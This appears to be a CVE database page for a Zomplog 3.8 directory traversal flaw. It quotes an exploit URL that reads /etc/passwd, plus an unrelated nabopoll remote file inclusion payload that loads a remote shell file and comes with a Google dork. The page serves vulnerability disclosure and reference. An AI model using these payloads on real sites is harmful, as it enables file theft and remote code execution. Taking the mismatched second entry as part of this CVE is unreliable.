CVE-2007-2157
Published 2007-04-19
CVE-2007-2157: Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file…
Priority: P3 (39)
Severity: high, 7.8 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N
EXPLOIT
EPSS: 3.51% (87.7th percentile)
Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zomplog | zomplog | — | — |
No detection rules found.
Exploit-DB
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
exploitdb·2007-04-18
CVE-2007-2157 Zomplog 3.8 - 'force_download.php' Remote File Disclosure
---
```
Y! Underground Group

Portal......: Zomplog v3.8
Author......: Dj7xpl / [email protected]
Type........: Remote File Disclosure Vulnerability
Download....: www.zomp.nl/zomplog
Page........: http://Dj7xpl.2600.ir

Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path]
E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd
```
# milw0rm.com [2007-04-18]
Exploit-DB
nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
exploitdb·2007-02-15
CVE-2005-2157 nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
---
By Cr@zy_King
[email protected]
Thanks : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim
Script : nabopoll 1.x
Risk : Remote File Include | High
Site : http://nabocorp.com/
Google Dork : inurl:"nabopoll/"
Exploit :
```php
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");
```
Files: survey.inc.php
Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
Ayyildiz.Org Present
# milw0rm.com [2007-02-15]
No writeups or analysis indexed.
http://osvdb.org/35016
http://secunia.com/advisories/24899
http://www.securityfocus.com/bid/23553
http://www.vupen.com/english/advisories/2007/1449
https://exchange.xforce.ibmcloud.com/vulnerabilities/33740
https://www.exploit-db.com/exploits/3764